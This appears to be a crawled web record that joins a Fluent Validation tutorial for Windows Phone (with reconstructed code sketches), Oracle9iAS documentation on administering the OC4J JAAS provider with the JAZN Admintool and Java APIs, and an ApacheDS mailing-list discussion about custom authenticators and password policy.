There is some work involved in getting everything set up. Don't worry, it's not rocket science.
First create a ValidatorFactory. This is needed because we use SimpleIoc to inject the validators into the ViewModels.
A ValidatorFactory class inherits from the ValidatorFactoryBase class included in the library.
The constructor of the ValidatorFactory is where all validators are registered. You could do this in the ViewModelLocator as well, like any other class / repository / viewmodel, but this keeps the ViewModelLocator cleaner and keeps the validation logic a bit closer together.
The CreateInstance function needs to be overridden and returns the instance of the requested validator.
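The article's factory listing did not survive extraction, so here is a minimal sketch of what it could look like, assuming MVVM Light's SimpleIoc is the container and each validator is registered in the constructor:

using System;
using FluentValidation;
using GalaSoft.MvvmLight.Ioc;

public class ValidatorFactory : ValidatorFactoryBase
{
    public ValidatorFactory()
    {
        // Register every validator the app uses; add one line per validator.
        SimpleIoc.Default.Register<MemberValidator>();
    }

    public override IValidator CreateInstance(Type validatorType)
    {
        // Resolve the requested validator type from the IOC container.
        return SimpleIoc.Default.GetInstance(validatorType) as IValidator;
    }
}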
Building a validator:
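The validator listing itself is also missing from this copy of the article; a minimal MemberValidator built on AbstractValidator<Member> could look something like this (the specific rules are assumptions):

using System;
using FluentValidation;

public class MemberValidator : AbstractValidator<Member>
{
    public MemberValidator()
    {
        // One rule per property of the Member model shown earlier.
        RuleFor(m => m.Name).NotEmpty();
        RuleFor(m => m.Country).NotEmpty();
        RuleFor(m => m.BirthDate).LessThan(DateTime.Today);
    }
}

The ValidatorFactory that serves these validators is then registered with SimpleIoc: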
SimpleIoc.Default.Register<ValidatorFactory>(true);
We pass in true as a parameter to make sure the object is instantiated at the moment of registration; that way all validators are registered in the IOC as well (as seen in the ValidatorFactory's constructor).
As a reference, these are all the built in validators
- NotNull
- NotEmpty
- NotEqual
- Equal
- Length
- LessThan
- LessThanOrEqual
- GreaterThan
- GreaterThanOrEqual
- Predicate
- RegEx
Quite an impressive list, and probably most of what developers will need. Just in case the one you need isn't included, you can build your own; we'll discuss that in a bit. Let's get these rules to work first.
Validating data
At this point there is a factory and a validator, and they are all getting registered in our IOC. Now we hook up the ViewModels and start validating.
In the MainViewModel, add a property of type Member to hold the values entered on the registration form.
To validate an instance we call the Validate() function on a validator for that type, in this case "Member".
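A sketch of what that call could look like in the MainViewModel (the _validatorFactory field, the NewMember property, and the ValidationSummary property are assumptions used only for illustration):

// Inside the MainViewModel (requires using System.Linq for Select):
private void ValidateMember()
{
    var validator = _validatorFactory.GetValidator<Member>();
    var result = validator.Validate(NewMember);

    if (!result.IsValid)
    {
        // Each failure carries the offending property and a human-readable message.
        ValidationSummary = string.Join(Environment.NewLine,
            result.Errors.Select(failure => failure.ErrorMessage));
    }
}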
Our validation is working! But those messages could be a bit better. Fluent Validation provides us with options to adjust the property name or the entire message. Change the constructor of the MemberValidator to this:
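A hedged sketch of what the adjusted constructor could look like; WithName changes how the property is referred to in the generated message, while WithMessage replaces the message entirely (the exact wording here is an assumption):

public MemberValidator()
{
    RuleFor(m => m.Name)
        .NotEmpty()
        .WithMessage("Please enter your name.");

    RuleFor(m => m.BirthDate)
        .LessThan(DateTime.Today)
        .WithName("Birth date");

    RuleFor(m => m.Country)
        .NotEmpty()
        .WithMessage("Please select a country.");
}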
Summary.
Note: This article was originally posted on Nico's Blog.
|
http://developer.nokia.com/community/wiki/Data_validation_using_Fluent_Validation_in_Windows_Phone
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
This chapter describes how to manage the Oracle9iAS Containers for J2EE (OC4J) JAAS Provider in Java2 Platform, Standard Edition (J2SE) and Java2 Platform, Enterprise Edition (J2EE) environments.
This chapter contains these topics:
Managing the JAAS provider in the J2SE and J2EE environments involves creating and managing realms, users, roles, permissions, and policy.
How you manage the JAAS provider depends on two things:
-PermissionClassManager
-PrincipalClassManager
-LoginModuleManager
Table 7-1 describes the general functionality of each tool in both XML-based and LDAP-based provider type environments.
XML-based and LDAP-based JAAS providers enable different functionalities as described in Table 7-2.
You can use Oracle Enterprise Manager to perform two JAAS provider tasks:
Oracle Enterprise Manager functionality for the JAAS provider is currently only available for the LDAP provider environment and only for policy management tasks.
To use the Oracle Enterprise Manager to perform JAAS provider tasks, navigate to the Oracle9i Application Server entry, then to the OC4J system component, and select the application default as follows:
To access the JAAS Provider:
The System Components panel appears:
Text description of the illustration syscom.gif
The main window for the JAAS provider appears:
Text description of the illustration jpolicy0.gif
Policies, which store JAAS authorization rules, consist of one or more grants or grant entries. Grant entries are grantees (principals and codesource (optional)) and their assigned permissions.
Managing JAAS Policy enables you to:
To search for and view grant entry data:
The JAAS Policy Management window appears. This is the same as the main JAAS provider window. See "Accessing the JAAS Provider".
The window immediately displays a results list that you can modify by entering a search phrase or using arrows that guide you to subsequent sections of the results list.
Wild cards are implied, that is, if you enter several letters, the results list shows all entries that begin with those letters, assuming the case is the same.
For the grant name you have entered, the following data appears:
To delete grant entry data:
To create a new grant entry:
The JAAS Policy Management window appears.
The New Grant: Name/CodeSource window appears, and enables you to enter a name for the new grant entry and define a codesource. The codesource is the code associated with the policy entry.
Text description of the illustration jpolicyc.gif
The New Grant: Principal(s) window appears and enables you to select the principal type and enter one or more principals to define the grant entry.
The available principal types are:
Text description of the illustration jpolicyd.gif
If you have selected the LDAP type, the name must be an X.500 distinguished name. Although the system accepts other names, they will be rejected when you finish. For other types, you can enter any name.
The New Grant: Permission window appears and enables you to enter the permission class, target, and action for the grant entry. These are essentially what the user is authorized to do with your application.
java.io.FilePermission).
Text description of the illustration jpolicya.gif
The entry is now granted these permissions on the designated target. The grant entry is complete.
The Java Permissions task enables you to search for and view the permissions of a principal on a given codesource and revoke these permissions. You can search by principal class or principal name.
To search for permissions on a principal:
The Permission Management window appears:
Text description of the illustration jpolicyb.gif
The available principal types are:
The results display on-screen including permission class, permission target, and permission actions, but the codesource does not appear.
To revoke permissions assigned to a principal:
You can only revoke one permission at a time.
The JAZN Admintool can manage both XML-based and LDAP-based JAAS provider data from the command prompt.
The JAZN Admintool is a flexible Java console application, with functions that can be called directly from the command line or through the shell interface of the Admintool. The shell uses UNIX-derived commands to perform specific JAAS provider functions.
This section includes the following topics:
The following examples illustrate the different ways that the JAZN Admintool commands can be used.
From the UNIX command line:
java -jar jazn.jar -listusers foo
From the shell interface of the Admintool (using command-line options):
JAZN:> listusers foo
From the shell interface of the Admintool (through modified UNIX commands):
JAZN:> cd /realms/foo/users JAZN:foo> ls
From the UNIX command line:
java -jar jazn.jar -addrole foo fooRole
From the shell interface of the Admintool (using command-line options):
JAZN:> addrole foo fooRole
From the JAAS provider shell (through modified UNIX commands):
JAZN:> cd /realms/foo/users JAZN:foo> mkdir fooRole
The JAZN Admintool provides the following command options, which are described in greater detail in the following sections. The JAZN Admintool command options can be invoked several different ways as described in "Usage Examples". Error messages display if the syntax or parameters specified are incorrect.
-addrealm realm admin {adminpwd adminrole|adminrole userbase rolebase realmtype}
-addrole realm role
-adduser realm username password
-checkpasswd realm user [-pw password]
-grantrole role realm {user|-role to_role}
-listrealms
-listroles [realm [user|-role role]|-perm permission]
-listusers [realm [-role role|-perm permission]]
-remrealm realm
-remrole realm role
-remuser realm user
-revokerole role realm {user|-role to_role}
-setpasswd realm user old_pwd new_pwd

-addperm permission permission_class action target [description]
-addprncpl principal_name prncpl_class params [description]
-grantperm realm {user|-role role} permission_class permission_actions
-listperms realm {user|-role role|-realm realm}
-listperm permission
-listprncpls
-listprncpl principal_name
-remperm permission
-remprncpl principal_name
-revokeperm realm {user|-role role} permission_class permission_actions
-shell
-getconfig default_realm admin password
-convert filename realm
-help -version
-addrealm realm admin {adminpwd adminrole | adminrole userbase rolebase realmtype} -remrealm realm
The
-addrealm option creates a realm of the specified type with the specified name, and
-remrealm deletes a realm.
Valid realm types are:
The user must provide the following:
-addrole realm role -remrole realm role
The
-addrole option creates a role in the specified realm, and
-remrole deletes a role from the realm.
-adduser realm username password -remuser realm user
The
-adduser option adds a user to a specified realm, and
-remuser deletes a user from the realm.
-checkpasswd [realm] user [-pw password]
The
-checkpasswd option indicates whether the given user requires a password for authentication. If
-pw is used, it displays a message indicating whether the specified password authenticates the user.
-grantrole role realm {user|-role to_role} -revokerole role realm {user|-role to_role}
The
-grantrole option grants the specified role to a user (when called with a user name) or a role (when called with
-role). The
-revokerole option revokes the specified role from a user or role.
-listrealms
The
-listrealms option displays all realms in the current JAAS provider environments.
-listroles [realm [user|-role role|-perm permission]]
The
-listroles option displays a list of roles that match the list criteria. This option lists the following:
role, when called with a realm name and the option -role
permission, when called with a realm name and the option -perm
-listusers [realm [-role role|-perm permission]]
The
-listusers option displays a list of users that match the list criteria. This option lists the following:
-role or -perm
-setpasswd realm user old_pwd new_pwd
The
-setpasswd option allows administrators to reset the password of a user given the old password.
-addperm permission permission_class action target [description] -remperm permission
The
-addperm option registers a permission with the JAAS provider
PermissionClassManager. The
-remperm option unregisters the specified permission class.
permission and
description can be multiple words if enclosed by quotation marks ("").
-addprncpl principal_name prncpl_class params [description] -remprncpl principal_name
The
-addprncpl option registers a principal with the JAAS Provider
PrincipalClassManager. The
-remprncpl option unregisters the specified principal class.
principal_name and
description can be multiple words if enclosed by quotation marks ("").
-grantperm realm {user|-role role} permission_class permission_actions -revokeperm realm {user|-role role} permission_class permission_actions
The
-grantperm option grants the specified permission to a user (when called with a username) or a role (when called with
-role). The
-revokeperm option revokes the specified permission from a user or role. A permission is denoted by its explicit class name (for example,
oracle.security.jazn.realm. RealmPermission) and its action and target parameters (for
RealmPermission, realmname
action). Note that there may be multiple action and target parameters.
-listperms realm {user |-role role| realm realm}
The
-listperms option displays all permissions that match the list criteria. This option lists the following:
PermissionClassManager
-role
-listperm permission
The
-listperm option displays detailed information about the specified permission, including the permission's display name, class, description, actions, and targets.
-listprncpls
The
-listprncpls option lists all principal classes registered with the
PrincipalClassManager.
-listprncpl principal_name
The
-listprncpl option displays detailed information about the specified principal, including the display name, class, description, and actions.
-shell
The
-shell option starts an JAAS provider interface shell. The JAAS Provider shell provides interactive administration of JAAS provider principals and policies through a UNIX-derived interface.
-getconfig default_realm admin password
The
-getconfig option displays the current configuration setting in
jazn.xml.
-convert filename realm
The
-convert option migrates the OC4J
principals.xml file into the specified realm of the current JAAS provider.
filename specifies the name and location of the OC4J principals file (typically stored in
j2ee/home/config/principals.xml).
The migration converts
principals.xml users to JAAS Provider
RealmUsers and
principals.xml groups to JAAS Provider roles. All permissions previously granted to a
principals.xml group are mapped to the JAAS Provider role. All users that were deactivated at the time of migration are not migrated. This is to ensure that no users can inadvertently gain access through the migration.
An error is returned if the specified file contains errors.
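For example, following the invocation style shown in the Usage Examples above (the realm name here is only an illustration):

java -jar jazn.jar -convert j2ee/home/config/principals.xml sampleRealm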
The
-help option displays a list of command options available with the JAZN Admintool.
The JAZN Admintool includes a shell called the JAZN shell interface. The JAZN shell provides an interactive interface to the JAAS Provider API.
The shell directory structure consists of nodes, where nodes contain subnodes that represent the parent node's properties. Figure 7-1 shows the node structure:
Text description of the illustration jazdg013.gif
In this structure, the user and role nodes are linked together. Consequently, if you are at /realms/realm/users/user/roles in the tree and type cd role, you are taken to /realms/realm/roles/role. Another way to look at this is that role 1 is a symbolic link of role 2.
Figure 7-2 shows nodes of the
xmlRealm created by the
jazn-data.xml file in "Sample jazn-data.xml Code".
Text description of the illustration jazdg014.gif
The JAZN shell can be recognized by the shell prompt
JAZN:>. At any point in time, the prompt indicates which realm the administrator is managing. The following is an example:
JAZN:> cd foo JAZN:foo> ls
To start the shell, invoke the JAZN Admintool with the
-shell option, as follows:
java -jar jazn.jar -shell
Shell commands consist of the command options in "Realm Operations" and the following series of UNIX-derived commands for viewing the principals and policies in a structured way. Relative and absolute paths are supported for all relevant commands.
Using the ls Command to List JAAS Provider Data
ls[path]
The
ls command mirrors its UNIX counterpart and lists the contents of the current directory or node. For example, if the current directory is the root,
ls lists all realms. If the current directory is
/realm/users, then
ls lists all users in the realm. The results of the listing depend on the current directory. The
ls command can operate with the
* wildcard.
cd path
The cd command, mirroring its UNIX counterpart, allows users to navigate the directory tree. Relative and absolute path names are supported. To exit a directory, type cd .. (two dots). Entering cd / returns the user to the root node. An error message is displayed if the specified directory does not exist.
mkdir directory_name [other_parameter] mk directory_name [other_parameter] add directory_name [other_parameter]
The
mkdir,
mk, and
add commands are synonyms of a command that creates a new subdirectory or node in the current directory. For example, if the current directory is the root, it creates a realm. If the current directory is
/realm/users, it creates a user. The effect of
mkdir depends upon the current directory. Some commands require additional parameters in addition to the name.
rm directory_name
The rm command mirrors its UNIX counterpart and removes the directory or node in the current directory. For example, if the current directory is the root, it removes the specified realm. If the current directory is
/realm/users, it removes the specified user. The effect of
rm depends on the current directory. An error message is displayed if the specified directory does not exist.
The
rm command can operate with the
* wildcard.
pwd
The
pwd command displays the current location of the user through the UNIX directory format. Undefined values are left blank in this listing.
The
help command displays a list of all valid commands.
man command_option man shell_command
The
man command mirrors its UNIX counterpart and displays more detailed usage information for the specified shell command or JAZN Admintool command option. Where information presented by the
man page and this document conflict, this document contains the correct usage for the command.
clear
The
clear command clears the terminal screen by displaying 80 blank lines.
exit
The
exit command exits the JAZN shell.
You can manage JAAS provider data by creating Java programs using the JAAS Provider APIs.
This section discusses the JAAS provider in LDAP environments. The emphasis is on Java programming, but it also provides useful information for those using Oracle Enterprise Manager or the JAZN Admintool.
This section contains the following topics:
Some sample Java programs for managing LDAP environments are provided for you. In the sample code, objects to be modified are presented in bold.
For some of the samples in the following chapters, relationships between samples are discussed after the sample code:
The types of code sample relationships discussed include the following:
The JAZNContext and JAZNConfig classes of the package oracle.security.jazn serve as a starting point for the JAAS provider. The JAZNContext and JAZNConfig classes contain methods such as getPolicy, getProperty, and getRealmManager that automatically retrieve information specific to the current JAAS provider instance.
The JAZNConfig class is designed for use with multiple instances of the JAAS provider.
The following code sample illustrates how JAZNContext or JAZNConfig are used in creating a realm in an LDAP-based environment:
RealmManager realmMgr = JAZNContext.getRealmManager(); ... realm = realmMgr.createRealm("abcRealm", realmInfo);
After you have installed and configured the required components, you must create realms. A realm is a user community instance maintained by the authorization system. Realms consist of a user manager and a role manager, and provide access to an LDAP-based provider environment of users and roles (groups).
This section contains the following topics:
Realms are created using the createRealm() method of the RealmManager class, which requires the following information:
The name of an administrative role (adminRole) given to the administrator. This role can then be granted to others, giving them administrative privileges.
The name of an administrative user (adminUser), a user with administrative privileges.
An External Realm is an LDAP-based realm that integrates existing user communities (user and role information not currently stored under the JAAS Provider context) with the JAAS provider.
User and role management in an External Realm must be handled by an Oracle Internet Directory tool.
The following code sample creates an External Realm with the objects shown in Table 7-3. The objects to be modified are presented in bold.
import oracle.security.jazn.spi.ldap.*; import oracle.security.jazn.*; import oracle.security.jazn.realm.*; import java.util.*; /** * Creates an external realm. */ public class CreateRealm extends Object { public CreateRealm() {}; public static void main (String[] args) { CreateRealm test = new CreateRealm(); test.createExtRealm(); } void createExtRealm() { Realm realm=null; try { Hashtable prop = new Hashtable(); prop.put(Realm.LDAPProperty.USERS_SEARCHBASE,"cn=users,o=abc.com"); prop.put(Realm.LDAPProperty.ROLES_SEARCHBASE,"cn=roles,o=abc.com"); // specifying the following LDAP directory object class // is optional. When specified, it will // be used as a filter to search for users prop.put(Realm.LDAPProperty.USERS_OBJ_CLASS,"orclUser"); // adminUser is optional String adminUser = "John.Singh"; String adminRole = "administrator"; RealmManager realmMgr = JAZNContext.getRealmManager(); InitRealmInfo realmInfo = new InitRealmInfo(InitRealmInfo.RealmType.EXTERNAL_REALM, adminUser, adminRole, prop); realm = realmMgr.createRealm("abcRealm", realmInfo); } catch (Exception e) { e.printStackTrace(); } } }
An Application Realm is an LDAP-based realm that supports external read-only users and internal role management.
The code for creating an Application Realm is similar to the code for creating an External Realm, with the following exceptions:
InitRealmInfo.RealmType is APPLICATION_REALM
prop.put(Realm.LDAPProperty.ROLES_SEARCHBASE, "cn=roles,o=defaultOrganization");
The RealmManager class of package oracle.security.jazn.realm enables you to drop a realm.
The following code sample shows how to drop a realm:
RealmManager realmMgr = JAZNContext.getRealmManager(); realmMgr.dropRealm("abcRealm");
The JAAS provider administrator and the realm administrator both have permission to drop a realm.
You cannot create or manage users directly in the JAAS provider if you are using an LDAP-based provider type. For those tasks, use an Oracle Internet Directory tool.
You can add users to a realm using the realm's UserManager interface, as shown in the following code:
UserManager usermgr = realm.getUserManager(); RealmUser user = usermgr.getUser("Chitra.Kumar");
The RoleManager interface provides methods to manage roles. Table 7-4 describes some of the methods available with the RoleManager interface.
Table 7-4 RoleManager Methods
Managing roles requires getting the realm from the RealmManager, as described in "The JAZNContext and JAZNConfig Classes". After that, you get an instance of the RoleManager interface with the method you are calling.
This section contains these topics:
Roles are created either externally in an External Realm with an Oracle Internet Directory tool, or internally in an Application Realm with RoleManager.
The following code sample shows how to create a role with RoleManager:
RoleManager rolemgr = realm.getRoleManager(); RealmRole role = rolemgr.createRole("devManager_role");
You can grant roles in an Application Realm, but not in an External Realm.
Roles are granted by an instance of RoleManager.
These lines show how to grant a role:
RoleManager rolemgr = realm.getRoleManager(); ... rolemgr.grantRole(user, director_role);
These lines are key to the sample code shown in Example 7-2.
This sample code demonstrates granting a role, manager_role, to another role, director_role, and granting the director_role to a user, Chitra.Kumar. Consequently, Chitra is granted the director_role directly, and the manager_role indirectly.
The objects to be modified are presented in bold.
import oracle.security.jazn.spi.ldap.*; import oracle.security.jazn.*; import oracle.security.jazn.realm.*; import java.util.*; public class GrantRole extends Object { public GrantRole() {} public static void main (String[] args) { GrantRole test = new GrantRole(); test.grantRole(); } void grantRole() { try { RealmManager realmMgr = JAZNContext.getRealmManager(); Realm realm = realmMgr.getRealm("devRealm"); RoleManager rolemgr = realm.getRoleManager(); RealmRole manager_role = rolemgr.getRole("manager_role"); RealmRole director_role = rolemgr.getRole("director_role"); UserManager usermgr = realm.getUserManager(); RealmUser user = usermgr.getUser("Chitra.Kumar"); /* grants manager_role to director_role */ rolemgr.grantRole( director_role, manager_role); /* grants director_role to Chitra */ rolemgr.grantRole( user, director_role); } catch (JAZNException e) { System.out.println("Exception "+e.getMessage()); } } }
The following code sample shows how to drop a role with RoleManager:
RoleManager rolemgr = realm.getRoleManager(); rolemgr.dropRole("devManager_role");
Permissions are extended from the java.security.Permission class. The JAAS provider provides four classes of permissions representing types of actions that can be performed. See Table 4-2 for the list of permissions.
Permissions are all created with constructors, such as the following RealmPermission:
RealmPermission Perm1 = new RealmPermission("devRealm", "createRole");
JAAS provider policy grants permissions to principals, such as users and roles. The policy can be modified after initialization to grant and revoke permissions to grantees.
These lines of code are key to the sample class shown in "Modifying User Permissions Code".
final JAZNPolicy policy = JAZNContext.getPolicy(); ... policy.grant(new Grantee(propset, cs), new FilePermission("report.data", "read"));
You can manage JAAS provider data by modifying XML files used by the JAAS Provider APIs.
This section discusses the JAAS provider in XML-based provider environments. The emphasis is on data files that you create yourself based on the XML schema, but it also provides useful information for those using the JAZN Admintool.
The XML-based environment provides fast, simple, lightweight JAAS provider management. You can use an XML file (named jazn-data.xml in this example) to manage the JAAS provider realm and policy information. Table 7-6 describes the sections of the jazn-data.xml file.
The jazn-data.xml file is specified as follows:
jazn.xml configuration file
orion-application.xml configuration file
XML realm and provider information is stored in an XML file typically named jazn-data.xml. To work correctly, the XML file must conform to specific policy schema and DTD standards.
The XML data file must conform to the following DTD:
<!ELEMENT jazn-data (jazn-realm?, jazn-policy?, jazn-permission-classes?, jazn-principal-classes?, jazn-loginconfig?)> <!-- Realm Data --> <!ELEMENT jazn-realm (realm*)> <!ELEMENT realm (name, users?, roles?, jazn-policy?)> <!ELEMENT users (user*)> <!ELEMENT user (name, display-name?, description?, credentials?)> <!ELEMENT name (#PCDATA)> <!ELEMENT display-name (#PCDATA)> <!ELEMENT description (#PCDATA)> <!ELEMENT credentials (#PCDATA)> <!ELEMENT roles (role*)> <!ELEMENT role (name, display-name?, description?, members)> <!ELEMENT members (member*)> <!ELEMENT member (type, name)> <!ELEMENT type (#PCDATA)> <!-- Policy Data --> <!ELEMENT jazn-policy (grant*)> <!ELEMENT grant (grantee, permissions?)> <!ELEMENT grantee (display-name?, principals?, codesource?)> <!ELEMENT principals (principal*)> <!ELEMENT principal (realm-name?, type?, class, name)> <!ELEMENT realm-name (#PCDATA)> <!ELEMENT codesource (url)> <!ELEMENT url (#PCDATA)> <!ELEMENT permissions (permission+)> <!ELEMENT permission (class, name, actions?)> <!ELEMENT class (#PCDATA)> <!ELEMENT actions (#PCDATA)> <!-- Principal Class Data --> <!ELEMENT jazn-principal-classes (principal-class*)> <!ELEMENT principal-class (name, description?, type, class, name-description-map?)> <!ELEMENT name-description-map (name-description-pair*)> <!ELEMENT name-description-pair (name, description?)> <!-- Permission Class Data --> <!ELEMENT jazn-permission-classes (permission-class*)> <!ELEMENT permission-class (name, description?, type, class, target-descriptors, action-descriptors?)> <!ELEMENT target-descriptors (target-descriptor*)> <!ELEMENT target-descriptor (name, description?)> <!ELEMENT action-descriptors (action-descriptor*)> <!ELEMENT action-descriptor (name, description?)> <!-- Login Module Data --> <!ELEMENT jazn-loginconfig (application*)> <!ELEMENT application (name, login-modules)> <!ELEMENT login-modules (login-module+)> <!ELEMENT login-module (class, control-flag, options?)> <!ELEMENT control-flag (#PCDATA)> <!ELEMENT options (option+)> <!ELEMENT option (name, value)> <!ELEMENT value (#PCDATA)>
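For reference, the following minimal jazn-data.xml fragment conforms to this DTD; the realm, user, and role names are only illustrative:
<jazn-data>
  <jazn-realm>
    <realm>
      <name>devRealm</name>
      <users>
        <user>
          <name>Chitra.Kumar</name>
          <credentials>welcome1</credentials>
        </user>
      </users>
      <roles>
        <role>
          <name>manager_role</name>
          <members>
            <member>
              <type>user</type>
              <name>Chitra.Kumar</name>
            </member>
          </members>
        </role>
      </roles>
    </realm>
  </jazn-realm>
</jazn-data>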
There are three additional utilities for managing the JAAS provider. These classes work with both LDAP-based and XML-based provider types. The classes can be used and managed programmatically. Additionally, two can be managed through the JAZN Admintool.
PermissionClassManager - Integrates with the JAZN Admintool
PrincipalClassManager - Integrates with the JAZN Admintool
LoginModuleManager - Works only with J2EE applications and is not activated with the JAZN Admintool
The PermissionClassManager is a repository of all registered Permission classes and a utility to help manage them. Registering a permission class allows access to stored metadata that provides specific information about a given permission's target, action, and/or description. Failure to register a given permission class does not affect the JAAS provider's ability to use the permission class. That is, the JAAS provider does not limit permission grants or revocations to those classes registered with the PermissionClassManager.
The PermissionClassManager works with the JAZN Admintool to perform these functions:
The PrincipalClassManager represents the repository of all registered Principal classes and a utility to help manage them. The JAAS provider does not limit itself to principal classes that have been registered with the PrincipalClassManager.
The PrincipalClassManager works with the JAZN Admintool to perform these functions:
LoginModuleManager is the JAAS Provider implementation of the JAAS Configuration class and provides login configuration support to applications. The Configuration class is a registry of applications and the corresponding login modules used by a given application, together with the order in which they are to be used. There are both LDAPLoginModuleManager and XMLLoginModuleManager implementations of the LoginModuleManager.
|
http://docs.oracle.com/cd/A97329_03/web.902/a95879/jaas_man.htm
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
I was writing up a little game kit when I ran into a little problem. When you enter a command, it skips past all the if/else statements and defaults to the final else statement.
import java.util.*; //used to make imput work class Text_Game_Kit { //main method, where the game takes place public static void main(String args[]) { //Declaring everything //position as a Y cordinate int POSY = 0; //position as an X cordinate int POSX = 0; //Placeholder for input String input = ""; //The First Chest is not open boolean Chest1 = false; String Chest1OPCL = " closed"; // the first chest is closed. This is to enhance the text. //Is there an enemy? boolean enemy = false; String enemyname = ""; //Type of enemy. i.e. Skeleton, Zombie, etc. // boolean to see if the game is done boolean done = false; //if the game is not done, keep running while (!done) { //quickly check if the game is done. if it is, break everything if (done) { break; } //these are commands. try to see how they work. all commands must be lowercase. //Movement Outputs: tells the user what the character sees if (POSX==0&&POSY==0) //If you are at the starting position: 0,0. You see a chest from here. Reach it by saying "move up" 3 times. { System.out.println("You wake up in a poorly lit room. You see a" + Chest1OPCL + " chest 3 steps to the north"); } else if (POSX==0&&POSY==3) //You have just moved up 3 times. you can open the chest by saing "open" { System.out.println("There is a" + Chest1OPCL + " chest in front of you."); } //Danger Commands: tells the user other information besides the Movement Outputs if (enemy) { System.out.println("You are being attacked by a" + enemyname + "."); } //Get the input input=in(); //handle the input. This includs all do able commands. typing help will list them. typing help and then a command will describe it. The only changing here should be to add commands //Moving Commands if (input==("up")) { POSY++; //move up } else if (input==("down")) { POSY--; //go down } else if (input==("left")) { POSX--; //move left } else if (input==("right")) { POSX++; //move right } //opening commands: deals with: is there a chest, is it open, and what happens else if (input==("open")) { if (POSX==0&&POSY==3&&!Chest1) //if the chest isnt open and you are at 0,3: the place where chest1 is. { System.out.println("You open the chest and find a sword. You hear the rattling of bones behind you."); enemy=true; enemyname=" Skeleton"; Chest1=true; Chest1OPCL="n open"; //now text thinks its open // you open the chest and are now being attacked by a skeleton. use "attack" to kill it. } // you can insert more chests here, you must use else if //if there is no chest else { System.out.println("You see nothing to open!"); } } //Attacking Command else if (input=="attack") { if (enemy) { System.out.println("You attack a" + enemyname + ". It falls rather easily."); //Staging. this is rather difficult because the attack command dosent know what you just attacked. if (enemyname == " Skeleton") { done=true; //in this short kit, killing the skeleton is the end. however, you can use anything here. if you want, you can make this progress, or have another enemy pop up, a door open, etc. if you need help here, just ask. I understand its a bit vague. } } else { System.out.println("You find nothing to attack, so you swing at the air for good measure"); } } //help, and any variants. Add more if you make new commands else if (input=="help") { System.out.println("Commands are: up, down, left, right, open, help, and attack. Say help with a command after it to see more information"); //make sure to put any added here. 
} //indepth command help else if (input=="help up") { System.out.println("This makes you move fowdard"); } else if (input=="help down") { System.out.println("This makes you move backwards"); } else if (input=="help left") { System.out.println("This makes you move left"); } else if (input=="help right") { System.out.println("This makes you move right."); } else if (input=="help open") { System.out.println("This opens a chest, if there is one."); } else if (input=="help attack") { System.out.println("This attacks an enemy, if there is one."); } else if (input=="help help") { System.out.println("You IQ must me in the double digits"); } //The end of the command cycle. all other commands must be above this else { System.out.println("That is not a command. Try using help to find more commands."); } } //end of the loop. only goes here when the game is done System.out.println("Congradulations! You've won!"); } //This method gets input public static String in() { Scanner scan=new Scanner(System.in); String word = "Temp"; word=scan.next(); return word; } }
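A likely cause, for what it's worth: the commands are compared with ==, which tests whether two String references point to the same object, not whether their characters match. Scanner.next() returns a new String, so input == "up" is false even when the user typed "up". A minimal sketch of the usual fix (using the standard java.lang.String methods):

// compare string contents, not object references
if (input.equals("up")) {
    POSY++;
} else if (input.equalsIgnoreCase("attack")) {
    // ... the same change applies to every other command, and to enemyname
}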
|
http://www.javaprogrammingforums.com/whats-wrong-my-code/37914-bad-output.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
On Fri, Nov 19, 2010 at 12:37 PM, Alex Karasulu <akarasulu@apache.org> wrote:
>
>
> On Fri, Nov 19, 2010 at 12:29 PM, Kiran Ayyagari <kayyagari@apache.org>
> wrote:
>>
>> On Fri, Nov 19, 2010 at 12:14 PM, Alex Karasulu <akarasulu@apache.org>
>> wrote:
>> > Hi Emmanuel, Antoine,
>> >
>> > On Fri, Nov 19, 2010 at 11:41 AM, Emmanuel Lecharny
>> > <elecharny@gmail.com>
>> > wrote:
>> >>
>> >> Hi guys,
>> >>
>> >> yesterday, we had an interesting convo with Antoine, about the
>> >> definition
>> >> of a dedicated Authenticator, and how to configure it.
>> >>
>> >
>> > Excellent. Thanks for posting to the ML about it.
>> >
>> >>
>> >> First, the Authenticator interface can be implemented but it's probably
>> >> a
>> >> better idea to extend the AbstractAuthenticator, as it brings some
>> >> references to the underlying DirectoryService for free, plus some
>> >> default
>> >> implementations to init and dispose the Authenticator. One thing to
>> >> take
>> >> care of is the PasswordPolicy which can be enabled or disabled. We have
>> >> to
>> >> determine the best way to deal with this service.
>> >>
>> >
>> > PasswordPolicy AFAICT is something that kicks in when updating or
>> > creating a
>> > new password. This mechanism of delegating authentication to some
>> > external
>> > authentication service in this case AD does not change the password.
>> > Hence
>> > why I'm thinking we don't need to worry about PP.
>> > Or am I missing something here?
>> >
>> PP also comes into picture while performing a bind and compare(of
>> password) operations
>> an e.x to determine the number of failed authentication attempts
>> but all this makes sense only if the user entries are stored in the
>> local server (ApacheDS in this case).
>
> Are we tracking login results (successes/failures) per user in their profile
> (LDAP entry)?
yes we do and these details are stored in the user entry itself
> Are we tracking login attempts when the bind principal is non-existent and
> if so where we doing that?
we cannot, if we don't have the user entry locally on the server
> We should also perhaps track the last IP where
> the login occurred to prevent those trying to dictionary attack via some
> account but this is not so much related to PP.
>>
yeah
>> >>
>> >> Another aspect is the Authenticator configuration : how to inject it
>> >> and
>> >> have it available when the server is stopped and restarted? The
>> >> solution is
>> >> probably to extend the existing configuration, which is based on the
>> >> DIT.
>> >> That means defining a specific Bean, plus the associated OC and AT. We
>> >> have
>> >> to think about it, and I would suggest we try to write a prototype that
>> >> demonstrates the way to extend the configuration. It has to be
>> >> documented,
>> >> as the Authenticator is an extension point.
>> >>
>> >
>> > Yes some configuration will be needed to activate and leverage this
>> > Authenticator.
>> > I do understand that there is some limited time and we need a simple
>> > implementation specifically for AD (most users will use this external
>> > authentication service) which is a great starting point. However let me share
>> > some ideas that I had very early on about this matter that several
>> > prospective clients years ago expressed they needed.
>> > First though before going on I want to mention that this is getting
>> > really
>> > close in nature to what SASL was designed for but I think this mechanism
>> > might be much more flexible. With that let me continue ...
>> > Prescriptive Delegation
>> > ---------------------------------
>> > Not every principal or user in ApacheDS will need to be delegated.
>> > Essentially this comes down to selective delegation. Whether to use
>> > ApacheDS
>> > authentication directly, or delegate and to which external
>> > authentication
>> > mechanism to delegate to is something that users mentioned they would
>> > like
>> > with this capability. There's even a more acute case where sometimes the
>> > binding principal might not even exist in ApacheDS yet you want
>> > delegation
>> > to occur.
>> > The holistic means to solve this problem is by using the administrative
>> > model to specify regions of the DIT you can dice and slice to have fine
